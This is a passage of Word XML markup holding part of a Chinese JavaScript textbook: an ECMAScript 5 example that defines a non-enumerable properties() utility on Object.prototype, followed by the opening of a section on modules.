      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>remove:{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments[i]in this.set){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete this.set[arguments[i]];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.n--;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</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54" w:name="9_8_6_Shu_Xing_Miao_Shu_Fu_"/>
      <w:r>
        <w:t>9.8.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　属性描述符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="254"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节讨论了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>中的属性描述符，但没有给出它们的示例代码。本节给出一个例子，用来讲述基于</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>如何对属性进行各种操作。在例</w:t>
      </w:r>
      <w:r>
        <w:t>9-23</w:t>
      </w:r>
      <w:r>
        <w:t>中给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>添加了</w:t>
      </w:r>
      <w:r>
        <w:t>properties()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（这个方法是不可枚举的）。这个方法的返回值是一个对象，用以表示属性的列表，并定义了有用的方法用来输出属</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>性和属性特性（对于调试非常有用），用来获得属性描述符（当复制属性同时复制属性特性时非常有用）以及用来设置属性的特性（是上文定义的</w:t>
      </w:r>
      <w:r>
        <w:t>hideProps()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>freezeProps()</w:t>
      </w:r>
      <w:r>
        <w:t>函数不错的替代方案）。这个例</w:t>
      </w:r>
      <w:r>
        <w:t>子展示了</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的大多数属性相关的特性，同时使用了一种模块编程技术，这将在下一节讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-23</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>属性操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t>properties()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法返回一个表示调用它的对象上的属性名列表的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>（如果不带参数调用它，就表示该对象的所有属性）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回的对象定义了</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个有用的方法：</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>descriptors()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>hide()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(function </w:t>
      </w:r>
      <w:r>
        <w:t>namespace(){//</w:t>
      </w:r>
      <w:r>
        <w:t>将所有逻辑闭包在一个私有函数作用域中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数成为所有对象的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function properties(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var names;//</w:t>
      </w:r>
      <w:r>
        <w:t>属性名组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments.length==0)//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的自有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>names=Object.getOwnPropertyNames(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(arguments.length==1</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>Array.isArray(arguments[0]))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>names=arguments[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>名字组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else//</w:t>
      </w:r>
      <w:r>
        <w:t>参数列表本身就是名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>names=Array.prototype.splice.call(arguments,0);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Properties</w:t>
      </w:r>
      <w:r>
        <w:t>对象，用以表示属性名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return new Properties(this,names);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将它设置为</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototpye</w:t>
      </w:r>
      <w:r>
        <w:t>的新的不可枚举的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是从私有函数作用域导出的唯一一个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(Object.prototype,"properties",{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:properties</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:false,writable:true,configurable:true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>这个构造函数是由上面的</w:t>
      </w:r>
      <w:r>
        <w:t>properties()</w:t>
      </w:r>
      <w:r>
        <w:t>函数所调用的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Properties</w:t>
      </w:r>
      <w:r>
        <w:t>类表示一个对象的属性集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function Properties(o,names){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.o=o;//</w:t>
      </w:r>
      <w:r>
        <w:t>属性所属的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.names=names;//</w:t>
      </w:r>
      <w:r>
        <w:t>属性的名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将代表这些属性的对象设置为不可枚举的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Properties.prototype.hide=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=this</w:t>
      </w:r>
      <w:r>
        <w:t>.o,hidden={enumerable:false};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.names.forEach(function(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o.hasOwnProperty(n))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(o,n,hidden);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>将这些属性设置为只读的和不可配置的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Properties.prototype.freeze=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=this.o,frozen={writable:false,configurable:false};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.names.forEach(function(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o.hasOwnProperty(n))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(o,n,frozen);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个对象，这个对象是名字到属性描述符的映射表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用它来复制属性，连同属性特性一起复制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Object.defineProperties(dest,src.properties().descriptors());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Properties.prototype.descriptors=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=this.o,desc={};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.names.forEach(function(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!o.hasOwnProperty(n))return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>desc[n]=Object.getOwnPropertyDescriptor(o,n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return desc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个格式化良好的属性列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>列表中包含名字、值和属性特性，使用</w:t>
      </w:r>
      <w:r>
        <w:t>"permanent"</w:t>
      </w:r>
      <w:r>
        <w:t>表示不可配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>"readonly"</w:t>
      </w:r>
      <w:r>
        <w:t>表示不可写，使用</w:t>
      </w:r>
      <w:r>
        <w:t>"hidden"</w:t>
      </w:r>
      <w:r>
        <w:t>表示不可枚举</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>普通的可枚举、可写和可配置属性不包含特性列表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Properties.prototype.toString=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=this.o;//</w:t>
      </w:r>
      <w:r>
        <w:t>在下面嵌套的函数中使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var lines=this.names.map(nameToString);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return"{\n"+lines.join(",\n")+"\n}";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function nameToString(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="",desc=Object.g</w:t>
      </w:r>
      <w:r>
        <w:t>etOwnPropertyDescriptor(o,n);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!desc)return"nonexistent"+n+":undefined";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(!desc.configurable)s+="permanent";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if((desc.get</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>!desc.set)||!desc.writable)s+="readonly";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!desc.enumerable)s+="hidden";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(desc.get||desc.set)s+="accessor"+n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">else </w:t>
      </w:r>
      <w:r>
        <w:t>s+=n+":"+((typeof desc.value==="function")?"function":desc.value);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return s;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>最后，将原型对象中的实例方法设置为不可枚举的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里用到了刚定义的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Properties.prototype.properties().hide();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}());//</w:t>
      </w:r>
      <w:r>
        <w:t>立即执行这个匿名函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="255" w:name="9_9_Mo_Kuai_"/>
      <w:r>
        <w:t>9.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将代码组织到类中的一个重要原因是，让代码更加</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>模块化</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，可以在很多不同场景中实现代码的重用。但类不是唯一的模块化代码的方式。一般来讲，模</w:t>
      </w:r>
      <w:r>
        <w:t>块是一个独立的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件。模块文件可以包含一个类定义、一组相关的类、一个实用函数库或者是一些待执行的代码。只要以模块的形式编写代码，任何</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码段就可以当做一个模块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中并没有定义用以支持模块的语言结构（但</w:t>
      </w:r>
      <w:r>
        <w:t>imports</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>exports</w:t>
      </w:r>
      <w:r>
        <w:t>的确是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>保留的关键字，因此</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的未来版本可能会支持），这也意味着在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中编写模块化的代码更多的是遵循某一种编码约定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>很多</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>库和客户端编程框架都包含一些</w:t>
      </w:r>
      <w:r>
        <w:t>模块系统。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Dojo</w:t>
      </w:r>
      <w:r>
